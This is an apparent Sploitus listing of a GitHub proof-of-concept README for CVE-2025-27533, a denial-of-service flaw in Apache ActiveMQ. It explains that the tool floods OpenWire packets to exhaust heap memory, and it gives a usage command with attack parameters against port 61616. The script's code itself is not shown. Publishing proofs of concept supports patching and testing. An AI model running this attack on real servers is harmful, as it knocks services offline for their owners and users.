Sploitus

Exploit for Memory Allocation with Excessive Size Value in Apache Activemq

githubexploit Β· 2025-05-09

Exploit Code

README11 lines
## https://sploitus.com/exploit?id=A27C1C09-AF66-5B22-82B7-74B3E956A785
# CVE-2025-27533-Exploit-for-Apache-ActiveMQ
(PoC) exploit for **CVE-2025-27533**, a Denial of Service (DoS) vulnerability in Apache ActiveMQ. This tool sends malicious OpenWire packets to exhaust the JVM heap memory of the target server,  and potentially crashing the ActiveMQ service on port `61616`.

USE
```
python CVE-2025-27533_Exploit.py --host  --port 61616 --total-packets 2000 --buffer-sizes 0x1E00000 0x3200000
```

--------------------------------------------------------------------------------
![ActiveMQ](poc_ActiveMQ.jpg)